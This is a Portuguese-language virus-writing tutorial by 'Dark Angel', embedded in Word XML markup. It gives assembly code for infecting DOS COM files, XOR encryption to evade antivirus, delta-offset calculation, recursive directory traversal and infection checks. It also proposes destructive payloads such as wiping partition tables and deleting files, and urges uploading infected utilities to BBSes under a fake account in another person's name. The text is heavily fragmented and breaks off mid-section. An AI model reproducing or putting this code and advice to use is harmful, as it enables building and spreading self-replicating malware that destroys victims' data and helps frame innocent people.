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t-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="3959" w:dyaOrig="4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25pt;margin-top:1.2pt;width:396.5pt;height:45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9369576" r:id="rId2"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">AVISO: O autor não se responsabiliza pelo mau uso desse texto!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=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-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=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Guia de criação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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>virus por Dark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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Angel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írus são horríveis criações que foram escritas para se multiplicare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 destruírem os sistemas de idiotas incautos.  Isso elimina d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istema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odos os simplesões que não acham um problema quando um arquiv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 100 byt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ansforma-se em um de 1000 bytes.  Bah, esse imbecis não deveria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xistir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ndo assim, é nosso trabalho sagrado varrer os discos rígidos dele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a fac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a terra.  É apenas uma questão de sobrevivência do mais forte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rque eu criei esse guia?  Depois de escrever muitos virus, eu fiquei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aben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e os criadores de virus geralmente aprendem a criar virus atrave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os seu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óprios vírus ou ao examinar o codigo dessassemblado de outr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íru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iste uma falta incrível de informação no assunto.  Mesmo livr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ublicado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r grandes nomes tal como Burger,  não mostram como são criad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s vírus.  Ess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uia irá mostrar a você como criar um vírus e também irá dar a você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m mont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 códigos fontes para incluir em seu próprio víru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riar vírus não é tão difícl como você deve estar imaginando.  Pa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creve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m vírus efetivo, entretanto, você *deve* conhecer a linguage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ssembly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equeno, código compacto são marcas registradas da linguage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ssembly e essa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ão características desejáveis dos vírus.  Entretanto, *não* é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ecessário escreve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puro assembler.  C também pode ser usado, uma vez que el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ermite quase control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otal no sistema enquanto gera código relativamente compacto (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ocê ficar long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s bibliotecas de funções).  Entretanto, você deverá acessar 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terrupções, assi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hecimento em assembly continua necessário.  Entretanto, ficar n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ssembly pur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é melhor, uma vez que muitas operações são mais facilm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dificadas em assembly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 você não conhece assembly, eu recomendo pegar uma cópia d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íblia Microsoft d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acro Assembler (Nabajyoti Barkakati, ISBN #: 0-672-22659-6).  É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m livro simpl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 seguir cobrindo o assembly com muitos detalhe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ambém pegar uma cópia de Undocumented DOS (Schulman, et al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SBN #0-201-57064-5)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ambém seria muito útil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questão de qual compilador usar também é difícil.  Eu sugiro usa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orland Turbo  Assembler e/ou Borland C++.   Eu não tenho um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ópia do Zortech C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ele é muito grande para download), mas eu acho que ele é uma bo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colha.  Fiqu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onge dos compiladores Microsoft, uma vez que eles não são tã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lexíveis ne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ficientes como aqueles dos outros fabricante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m pouco mais de itens rondam a lista de ferramentas que ajudam n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strução d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írus.  As últimas versões do Norton Utilities são uns dos program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ais poderoso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isponíveis, e são imensamente necessários.  TENHA CERTEZ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E VOCÊ TENHA UMA CÓPIA!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ocê pode encontrar isso em qualquer BBS decente.  O Norton é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sado em cada passo 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cesso, da escrita até o teste.  Bons helps sobre debugger.  Utilitári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 control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memória tais como MAPMEM, PMAP, e MARK/RELEASE, sã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tilitários sem valor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pecialmente quando criando vírus TSR.  Sourcer, o dissassemblado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mentado, é útil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examinar o código de outros vírus (esse é um bom lugar pa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egar idéias/técnica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a seu vírus)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gora que você tem suas ferramentas, você está pronto para criar u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rabalho de art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riado para esmagar os sistemas dos cretinos.  Existem três tipos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írus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1) Vírus pequenos (abaixo dos 500 bytes) que são feitos pa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rem indetectáveis devido ao seu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equeno tamanho.  TINY  é um desses vírus.    Eles são geralm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uito simples devi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ao fato que seu tamanho é muito limitad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2) Vírus Grandes  (acima dos 1,500 bytes)   que são feitos para se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detectáveis devido a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fato que eles cobrem seu rastro muito bem (todo aquele códig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RVE para algo!). O melho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xempho desse é o vírus Whale, que é talvez o melhor vírus 'Stealth'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tualmente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3) Outros vírus que não são feitos para serem escondid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otalmente (os escritores não liga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ara isso).  Os vírus comuns são como esses.  Todos os vírus qu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obreescrevem estão ness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categori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ocê deve decidir que tipo de vírus você irá escrever.  Eu irei trata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ais do segundo tip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Vírus Stealth).  Entretanto, muitas das técnicas descritas podem se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acilmente aplicadas par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 primeiro tipo (vírus pequenos)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ntretantos, os vírus pequenos geralmente não tem muitas d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"qualidades" dos vírus maiores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ais como diretórios transversal.  O terceiro tipo é mais um tipo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plicação de caválo d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óia, e irá garantir uma rápida (muito, muito rápida!) discussão mai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arde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m vírus pode ser dividido em três partes: a replicação,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amuflagem, e a bomba.  A part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plicadora controla a multiplicação do vírus para outros arquivos,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amuflagem evita o víru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ser encontrado, e a bomba apenas executa quando a condição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tivação do vírus (more sobr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sso mais tarde) são satisfeita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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>A REPLICAÇÃ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trabalho para a replicação é o de multiplicar o vírus através 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istema do cara que pegou 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írus.  Como fazer isso sem destruir os arquivos que ele infecta? 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orma mais fácil de faze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se tipo de replicação é através da infecção de arquivos COM.  El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imeiro salva os primeiro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ytes do arquivos infectado.  Depois ele copia uma pequena parte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u código para o início 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quivo, e o resto para o fim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+----------------+      +------------+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| P1 | P2              |       | V1 | V2    |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+----------------+      +------------+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Arquivo normal           O código do víru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 diagrama, P1 é a parte 1 do arquivo, P2 é a parte 2 do arquivo, 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1 e V2 são as partes 1 e 2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o vírus.  Note que que o tamanho de P1 deve ser o mesmo do que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amanho de V1, mas o tamanho d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2 não deve ser necessariamente o mesmo de V2.  O vírus primeir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alva P1 e copia ele para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)  O fim do arquivo ou 2) dentro do código do vírus.  Vam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ssumir que ele copia o código par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 fim do arquivo.  Esse arquivo agora agora está assim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+---------------------+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| P1     | P2        | P1    |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+---------------------+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ntão, o vírus copia a primeira parte de si próprio para o início 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quiv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+---------------------+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| V1 | P2        | P1      |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+---------------------+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inalmente, o vírus copia a segunda parte de si próprio para o fim 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quivo. A cópia final, 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quivo infectado fica parecendo assim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+-----------------------------+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| V1   | P2          | P1   | V2      |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+-----------------------------+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questão é: Que diabos fazem V1 e V2?  V1 transferem controle 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ograma para V2.  O códig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a fazer isso é simple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JMP FAR PTR Duh       ; Takes four byt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Duh  DW  V2_Start          ; Takes two byt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uh é um far pointer (Segmento:Offset) apontando para a primei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strução de V2.  Note que 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alor de Duh deve ser modificada para refletir o tamanho do arquiv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e está infectado.  Po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emplo, se o tamanho original do programa é 79 bytes, Duh pode se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odificado assim a instruçã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 CS:[155h] é executada.  O valor de Duh é obtido ao acrescentar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amanho de V1,  o tamanh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iginal do arquivo infectado, e 256 (para contar para o PSP).  Nes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aso, V1=6 e  P1 + P2 = 79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ssim 6 + 79 + 256 = 341 decimal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155 hex)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m método alternado, muito mais difícil de entender segue-se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DB 1101001b              ; Código para o JMP (deslocamento de 2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yte)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Duh  DW V2_Start - OFFSET Duh ; deslocamento de 2 byt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sso insere o offset jump diretamente no código seguido da instruçã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jump.  Você também pod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rocar a segunda linha co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DW V2_Start - $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e faz a mesma taref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2 contém o resto do código, i.e. o código que faz todo o resto. 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última parte de V2 copia P1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obre V1 (na memória, não no disco) e então transfere o controle pa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 início do arquivo (n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emória).  O programa original então roda feliz como se nada tives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contecido.  O código par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azer é muito simple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MOV SI, V2_START      ; V2_START é um rótulo marcando on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2 inici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SUB SI, V1_LENGTH     ; Volta atras para onde P1 está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mazena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MOV DI, 0100h         ; Todos os arquivos COM são carregados @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S:[100h] na memóri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MOV CX, V1_LENGTH     ; Move CX byt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REP MOVSB             ; DS:[SI] -&gt; ES:[DI]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MOV DI, 0100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JMP DI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se código assume que P1 está localizado logo após V2, como aqui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1_Stored_Here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2_Start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sso também assume ES  igual a CS.  Se essas instruções são falsas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ude o código de acord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qui vai um exemplo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PUSH CS                          ; armazena C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POP  ES                            ;  e move isso para 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>; Note MOV ES, CS não é uma instruçã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strução válid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MOV SI, P1_START        ; Move de onde P1 está armazena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MOV DI, 0100h                ;  para CS:[100h]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MOV CX, V1_LENGT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REP MOVSB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MOV DI, 0100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JMP DI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se código primeiro move CS para ES e então seta o pointer fo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  MOVSB para onde P1 está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ocalizado.  Lembre-se que isso tudo está pegando lugar na memória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ssim você precisa o OFFSET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P1, não apenas a localização física do arquivo.  O offset de P1 é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0h maior do que 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ocalização física do arquivo, uma vez que arquivos COM sã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arregados a partir de CS:[100h]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sim aqui está um sumário das partes do vírus e localização d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ótulos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1_Start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JMP FAR PTR Du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Duh  DW  V2_Start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1_End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2_Start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2_End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1_Start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; Primeira parte do programa armazenado aqui para uso futur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1_End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2_Start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; Programa Real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2_End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1_Length EQU V1_End - V1_Start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lternativamente, você pode armazenar P1 em V2 como segue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2_Start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1_Start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1_End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2_End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É isso esquema para infectar um arquivo COM sem destruir ele!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imples, não?  Arquivos EXE, entretanto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ão um pouco mais difíceis de infectar sem deixar eles inexecutáveis -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u irei cobrir esse tópic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m um arquivo mais tarde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gora nós iremos voltar nossa atenção para a porção replicadora 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íru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s passos são mostrados abaixo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1) Encontrar um arquivo para infecta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2) Checar se ele já está infecta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3) Se sim, voltar para 1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4) Infectar el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5) Se já infectou arquivos que chegam então sai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6) Senão, volta para 1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ncontrar um arquivo para infectar é uma forma simples de escreve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m procedimento de diretório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ansversais e pode-se instruir chamadas FINDFIRST  e FINDNEXT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a encontrar arquivos possívei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infectar.  Uma vez que você encontra um arquivo, abra ele e lei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s primeiros poucos byte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 eles são os mesmos que os primeiros bytes V1, então o arquivo já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tá infectado.  Se o byt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V1 não são exclusivos de seu vírus então mude ele assim ele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rão.  É *extremamente*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mportante que seu vírus não reinfecte os mesmos arquivos, uma vez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e foi  dessa forma que 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Jerusalem foi detectado pela primeira vez.  Se o arquivos não estav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fectado, então infecte-o!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fecção deverá ter os seguintes passos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1) Mudar os atributos do arquivo para nad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2) Salvar a data/hora do arquiv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3) Fechar o arquiv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4) Abra ele de novo em modo de leitura/gravaçã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5) Salve P1 e acrescente ele no fim do arquiv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6) Copie V1 para o início, mas modifique o offset para onde el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JMPs (pula) assim el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transfere o controle corretamente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7) Anexar V2 no fim do arquiv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8) Restaure atributos do arquivo e a data/hor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ocê pode manter um contador de número de arquivos infectad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urante essa rodada.  Se o númer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cede, digamos 3, então pare.  É melhor infectar aos pouco do que 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ixar descobrir ao tenta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fectar todo o drive de uma vez só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ocê deve cobrir todos os seus rastros quando você infecta u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quivo.  Salve os atributos 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rquivo originais mais a data e hora e restaure eles quando você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erminar.  ISSO É MUIT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MPORTANTE!  Isso pega 50 a 75 bytes de código, provavelm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enos, para fazer essas pouca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isas que fazem maravilhas na hora de esconder seu program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u irei incluir o código para a função de diretório transversal, assi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mo outras partes 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plicador na próxima edição do meu Guia de Víru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lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>CAMUFLAN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sa é a parte que camufla o programa para não ser encontrado pel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suário de todo dia e pelo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nti-víru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s forma mais simples de camuflagem é a encriptaçã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 código para uma encriptação simples em XOR segue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crypt_val   db   ?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crypt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crypt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mov ah, encrypt_val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mov cx, part_to_encrypt_end - part_to_encrypt_start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mov si, part_to_encrypt_start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mov di, si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xor_loop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lodsb                 ; DS:[SI] -&gt; AL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xor al, a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stosb                 ; AL -&gt; ES:[DI]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loop xor_loop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ret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te que os procedimentos de encriptação e desencriptação são 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esmas.  Isso é devido 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tureza louca do XOR.  Você pode chamar (CALL) esse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ocedimentos de qualquer lugar no program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as tenha certeza que não chame ele de um lugar de dentro da área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r encryptada, pois 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grama irá dar erros.  Quando escrever o vírus, mude o valor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criptação para 0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t_to_encrypt_start e part_to_encrypt_end indicam a parte que você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seja encriptar.  Use um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hama decrypt no início de V2 para desencriptar o arquivo assim seu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ograma pode rodar.  Quan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fectar um arquivo, primeiro mude o encrypt_val, depois cham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crypt, depois escreva V2 para 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im do arquivo, e chame decrypt.  TENHA CERTEZA QUE ESS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TE NÃO ESTEJA NA ÁREA QUE VAI SE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CRIPTADA!!!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qui está como V2 irá parecer com a camuflagem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2_Start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cealer_Start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cealer_End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plicator_Start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plicator_End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t_To_Encrypt_Start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t_To_Encrypt_End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2_End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lternativamente, você pode mover partes do código não-encripta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tre Part_To_Encrypt_End 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2_End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valor da encriptação é somente aparente.  Encriptação torna a taref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os anti-vírus difícil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encontrar seu vírus.  Ele também esconde algumas cadeias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extos localizadas em seu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ograma.  Esta é a forma mais fácil e curta de esconder seu víru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ncriptação é apenas uma forma de camuflar o vírus.  Há vírus qu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lteram as interrupções do DO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 altera a saída de dados do DIR, assim os tamanhos do arquiv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parecem normais.  Outra form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camuflar (Para vírus TSR) é alterar o DOS assim utilitários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emória não detectam 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írus.  Carregar o vírus em certas partes da memória permitem qu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les sobrevivam a um reboot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istem muitas técnicas de camuflagem do vírus, limitadas apen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ela imaginação do escritor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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>A BOMB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om, agora que toda a parte chata está feita.  A coisa indecente está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tida aqui.  A parte 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írus que faz todas as deleções/slowdown/etc que deixam os vírus tã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comodáveis.  De algum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dições de ativação para o vírus.  Isso pode ser qualquer coisa, in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a data de seu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iversário até quando o vírus infectou 100 arquivos.  Quando ess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dições se concretizam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ntão o seu vírus executa a bomba.  Alguma sugestões de bomb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ossíveis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1) Deixar o sistema mais lento - facilmente feito ao capturar um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terrupção e causar u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 xml:space="preserve">delay quando ela ativ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2) Deleção de arquivos - Deletar todos os arquivos ZIP do drive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3) Mostrar messagens - Mostrar uma messagem legal tipo dissen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lgo de mesmo efeito de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"Você está fodido"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4) Apagar/Trocar as tabelas de partição/Setor de Boot/FAT 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isco rígido - isso é muito mal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e muitos idiotas não conseguem arrumar iss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se é, com certeza, a parte engraçada de escrever um vírus, entã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ja original!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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PROBLEM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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>COM O OFFSET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iste um problema no cálculo de offsets.  Depois de você infecta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m arquivos, os locais da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ariáveis mudam.  Você TEM que contar isso.  Todos offset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lativos podem ficam o mesmo, ma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ocê tem que acrescentar o tamanho do arquivo para os offset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bsolutos ou seu programa não vai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uncionar.  Essa é a parte mais complicada ao escrever o vírus e leva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sso em conta irá aumenta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randemente o tamanho do vírus.  ISSO É MUITO IMPORTANTE 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OCÊ DEVE ESTAR ENTENDENDO ISSO ANT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TENTAR ESCREVER UM QUE NÃO SOBREESCREVE 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OGRAMAS!  Se você não o fizer, você vai se fude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 o seu vírus NÃO VAI TRABALHAR!  Uma parte inteira desse gui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ai ser devotado para ess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oblem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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>TESTAN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star o vírus é uma parte perigosa mas essential no processo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riação de vírus.  É para se te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rteza que pessoas *irão* ser prejudicadas pelo vírus.  Teste-o e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odas as condições e tenh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rteza que ele ativa-se dentro das condições.  Isso pode ser m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elhor feito se você ou algu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migo tiver um segundo computador para testas o vírus, mas, é claro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se não é o nosso cas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sim, é ESSENCIAL que você mantenha cópias de segurança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us arquivos, partição, boot record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 FAT.  Norton é ótimo em fazer isso.  Nao esqueça esse avis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orque você SERÁ atingido pelo seu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óprio vírus.  Quando eu fiz me primeiro vírus, meu sistema foi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baixo por dois dias porque eu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ão tinha boas cópias de segurança.  Com sorte, o vírus não era mui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strutivo.  Eu encontrei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 RamDrive uma ótima forma de testar os vírus, uma vez que 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anos não são permanente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amDrive também é ótimo para testar Cávalos de Tróia, mas esse é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m tópico para outro arquivo..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lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>DISTRIBUIN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sa é outra parte interessante da escrita de vírus.  Isso envolve envia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u program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rilhantemente feito através das linha de telefone para a sua BB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ocal.  O que você deve faze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é infectar um arquivo que faz algo interessante (pegue algu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tilitário útil de outra BBS)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fecte ele e dê um upload nele para o local onde ele será copiado po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suários de todo lugar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melhor coisa que seu vírus tem é que ele não é detectado po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nti-vírus idiotas como o d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cAffee, uma vez que ele é novo!  E é claro, tenha certeza que você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tá usando uma conta fals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duh).   Melhor ainda, crie uma conta false com o nome/número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elefone de alguém que você nã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oste e upload o arquivo infectado com o nome dele.  Você po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igar de volta de tempos em tempo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 usar uma porta como a ZDoor para checar a multiplicação do seu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írus.  Quantos mais copiara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u vírus, mais compartilharam a experiência do seu vírus!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u prometi uma breve seção em vírus que sobreescrevem programas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ssim, aqui esta ela..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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>VÍRUS QU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SOBREESCREVE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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PROGRAM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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>(OVERWRITING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udo o que esse vírus faz é espalhar-se pelo sistema.  Eles deixar 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quivos infectado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utilizados, assim eles são facilmente detectados.  É muito simple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azer um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+-------------+   +-----+   +-------------+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| Programa     | + |Vírus  | = |Vírus|ama      |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+-------------+   +-----+   +-------------+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ses vírus são pequenos, mas muito fáceis de serem detectados.  Iss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é o suficiente saber!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lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>BOM, É ISSO!!!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pero que você tenha gostado da primeira edição de Guia de Criaçã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 Vírus. Irá ter (com sorte)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uturas edições onde eu discutirei mais sobre vírus e irei inclui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uito mais código fonte. Até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á, Happy Coding!!!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 última parte do meu guia de criação de vírus, eu mostrei os vári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ipos de vírus e fiz um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reve discussão sobre cada.  Nessa edição, eu deverei devotar toda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inha atenção sobre a porçã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plicadora do vírus.  Eu prometi código e código eu estou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presentand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ntretanto, eu devo me afastar um momento porque chegou aos meu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uvidos que algumas cópia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iratas da primeira parte fora inadvertidamente realizadas.  Ess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ópias não contém uma seçã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ital que seria o cálculo de offset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ocê nunca sabe quando estão suas variáveis e o código está sumin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a memória.  Se você pensa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m pouco, isso seria muito óbvio.  Uma vez que você está anexan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 vírus para o fim de u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grama, a localização na memória esta sendo alterado, i.e. ele será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aior que o tamanho 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rquivo infectado.  Assim, para compensar, nós devemos pegar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udança no offset a partir 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írus original, ou o offset delta, e acrescentar aquilo para todas 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ferências de variávei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ruções que usam deslocamentos,  ex. offsets relativos, nã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ecisam ser modificados.  Essa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ruções são as classes JA, JB, JZ de instruções, JMP, SHORT, label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JMP, e CALL.  Então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ando possível use essas vez de JMP FAR PTR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uponha nos exemplos seguintes, que si é algo carregado no offset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lt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Troca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mov ax, counte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Po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mov ax, word ptr [si+offset counter]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Troca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mov dx, offset messag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Po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lea dx, [si+offset message]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ocê pode estar se perguntado, "Como diabos eu irei encontrar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ffset delta!?"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É muito simples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call setup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setup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pop  si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sub  si, offset setup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Uma explicação para o fragmento acima está vindo.  CALL setup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mpurra a localização para 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óxima instrução, ou seja, offset setup, indo para a pilha.  Depois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sa instrução é POPad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si.  Finalmente, o offset ORIGINAL de setup (calculada em temp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 compilação) é subtraíd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si, dando a você o offset delta.  No vírus original, o offset delta irá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r 0, ou seja a nov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ocalização do setup igual a velha localização do setup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É preferível usar bp como seu offset delta, uma vez que si é usado n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struções de cadeia d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racteres.  Use aquele que você achar melhor.  Eu irei aleatoriam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ssar de um para outr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pendendo de como cada um se encaix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Agora de volta para a replicação..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Um vírus biológico é um organismo parasítico que usa seu portado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a multiplicar a si mesm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le deve manter o portador vivo para manter-se vivo.  Apenas quan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le se multiplicou demais, é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e seu portador morre, morte horrível.  Os vírus eletrônic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odernos não são diferentes.  El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 acrescenta para um sistema portador e se reproduz até que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istema inteiro esteja fodid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le então elegantemente demole o sistema do idiota que estava com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íru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Replicação é aquilo que distingue um vírus de um simples cavalo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róia.  Qualquer um pod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azer um cavalo de tróia, mas um vírus é muito mais elegante.  El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ge praticamente invisível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 ele deixa a vítima sem defesas quando ele acaba com o sistema. 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imeira questão é, é claro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o um vírus se multiplica?  Tanto as infecções COM e EXE (co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otinas de infecção de exemplo)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verão ser apresentada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Existem duas grandes variedades de vírus: runtime(tempo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xecução) e TSR(Terminate and Stay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ident, termina e continua residente).  Vírus de Runtime, infect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quivos quando o program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fectado está rodando, enquanto que os vírus TSR ficam residente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ando o programa infecta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é executado, ele então captura as interrupções e infecta quando u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quivo é rodado, aberto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echado, e/ou durante a execução (i.e.  INT  20h,  INT  21h/41h)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xistem vantagens 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svantagens em cada uma.  Vírus Runtime são difíceis de detecta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ma vez que eles não aparece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mapas de memória, mas, olhando outro aspecto, o delay enquan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le procura arquivo e infect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m arquivo são um motivo para o usuário suspeitar de que algo está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aindo errado.  Vírus TSR, s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ão forem bem feitos, podem ser facilmente localizados po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tilitários como o MAPMEM, PMAP, etc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as são em geral, pequenos, desde que eles não precisem de funçã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a procurar por arquivos par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fectar.  Eles são mais rápidos do que vírus runtime, sendo devido a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ato que eles não tem qu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curar por arquivos para infectar.  Eu devo cobrir vírus runtim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qui, e vírus TSR em um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dição futur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Aqui está um sumário do procedimento de infecção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1) Achar um arquivo para infectar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2) Checar se ele possui os critérios para infecçã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3) Ver se ele já foi infectado, e se for, volte para 1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4) Senão, infecte o arquiv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5) Cubra seus rastro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Eu devo passar por cada um desses passo e mostrar código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xemplo para cada um. Note qu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aticamente um vírus completo pode ser feito com a informaçã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cima, você pode simplesment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parar o código e juntar tudo depois, como os fragmentos são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ários vírus diferentes que eu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crevi, você deve estar familiar com assembly.  Eu apresen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ragmentos de códigos; você qu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abe se quer usar eles como exemplos ou modifica-los para seu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óprio víru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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PASSO 1 -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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>ENCONTRAN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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>UM ARQUIV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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">PARA INFECTA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Antes de infectar um arquivo, você terá que encontra-lo primeiro!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sso é um passo decis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 performance do vírus, então isso deverá ser feito o mais efici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anto possível.  Par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írus runtime, existem algumas opções.  Você pode infectar arquiv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penas no diretório atual, ou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ocê pode fazer uma função de diretórios transversal para infecta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quivos em TODOS o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iretórios (apenas alguns poucos arquivos por vez, é claro), ou você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ode infectar arquivos e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lguns diretórios.  Por que você deve escolher apenas para infecta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quivos no diretório atual?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sso é uma limitação da eficácia das infecções.  Entretanto, isso é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eito em alguns vírus tant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a acelerar o processo quanto para diminuir o tamanho do códig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qui está uma função de diretório transversal.  Ele us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cursividade, assim ele é um pouc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ento, mas ele faz o trabalho.  Isso foi extraído com algum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odificações do Funky Bob Ross Viru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[Beta]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traverse_fcn proc    nea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push    bp                      ; Create stack fram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bp,sp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sub     sp,44                   ; Alocar spaço para DT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call    infect_directory        ; Vá para rotinas de encontrar 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strui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h,1Ah                  ;Alterar DT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lea     dx,word ptr [bp-44]     ; para distribuir o espaç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                    ;Faça isso agora!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h, 4Eh                 ;Find first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cx,16                   ;Mascara de diretóri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lea     dx,[si+offset dir_mask] ; *.*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jmp     short isdirok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gonow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cmp     byte ptr [bp-14], '.'   ; Primeiro caracter == '.'?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je      short donext            ; Sim, faz um loop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lea     dx,word ptr [bp-14]     ; senão carregar dirnam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h,3Bh                  ; e mudar de diretório lá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jc      short donext              ; Do next se inváli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c     word ptr [si+offset nest] ; nest++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call    near ptr traverse_fcn     ; diretório recurs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donext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lea     dx,word ptr [bp-44]     ; Carrega espaço alocado para DT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h,1Ah                  ; e configura DTA para essa nova áre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int     21h                     ; Porque isso pode'cause it might hav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hanged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h,4Fh                  ;Find next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isdirok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jnc     gonow                   ; Se OK, jmp para outro luga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cmp     word ptr [si+offset nest], 0 ; Se diretório raiz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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">;  (nest == 0)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jle     short cleanup                ; então Quit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dec     word ptr [si+offset nest]    ; Senão decrementa nest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lea     dx, [si+offset back_dir]; '..'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h,3Bh                  ; Mudar de diretóri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                    ; Para o próxim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cleanup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sp,bp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pop     bp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ret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traverse_fcn endp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; Variávei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nest     dw     0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back_dir db     '..',0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dir_mask db     '*.*',0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O código é auto-explicável.  Tenha certeza de que você tem um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unção  infect_directory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e scaneia o diretório em busca de arquivos para serem infectados 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enha certeza que ele nã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fecte arquivos já infectados.  Esta função, chama infect_file qu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fecta o arquiv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Note, como eu disse antes, isso é lento.  Um método rápido, não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elhor, é o método "ponto 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onto".  Hellraiser  mostrou a mim esse pequeno truque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asicamente, você continua procuran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cada diretório e, se você não tiver infectado arquivos suficientes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á para o diretóri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terior (ponto a ponto) e tenta denovo, e assim vai.  O código é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imple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dir_loopy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call    infect_directory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lea     dx, [bp+dotdot]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h, 3bh                 ; CHDI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jnc     dir_loopy               ; sair se está no diretóri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; Variabl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dotdot  db      '..',0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gora você deve encontrar um arquivo para infectar.  Isso é fei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nos fragmentos acima) po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ma função chamada infect_directory.  Essa função cham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INDFIRST e FINDNEXT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ma quantidade de vezes para encontrar arquivos para infectar.  Você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ve primeiro configura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m novo DTA.  NUNCA use o DTA no PSP (a 80h) porque alteran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quilo irá alterar os parâmetro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 linha de comando do programa infectado quando o controle é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tornado a ele.  Isso é feit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acilmento feito com o seguinte código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h, 1Ah                 ; Seta DT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lea     dx, [bp+offset DTA]     ; para uma variável chamada DT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wow!)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Onde DTA  é um pedaço de 42-byte de memória.  Depois, fazer um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érie de chamadas FINDFIRST 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INDNEXT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h, 4Eh                 ; Procura primeiro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cx, 0007h               ; Qualquer atributo do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lea    dx, [bp+offset file_mask]; DS:[DX] --&gt; máscara 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jc      none_found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found_another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call    check_infection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h, 4Fh                 ; Procura próximo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jnc     found_anothe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none_found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Onde file_mask  é DBed  tanto para '*.EXE',0 ou '*.COM',0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lternativamente, você pod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sar FINDFIRST para '*.*',0 e checar se a extensão é EXE ou COM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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PASSO 2 -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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>CHECAGEM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lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>CRITÉRIOS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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">INFECÇÃ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Seu vírus deve ser esperto em sua infecção.  Por exemplo, você po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ão querer infectar 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MAND.COM, uma vez que alguns programas (i.e. o maldi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luShot+) checa seu CRC ou checksu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ando executado.  Aqui abaixo vai uma forma de como não infecta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 COMMAND.COM, ele checa s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s últimas letras são "ND"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cmp     word ptr [bp+offset DTA+35], 'DN'  ; Order Reversa d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lavr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jz      fail_check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</w:t>
      </w:r>
      <w:r>
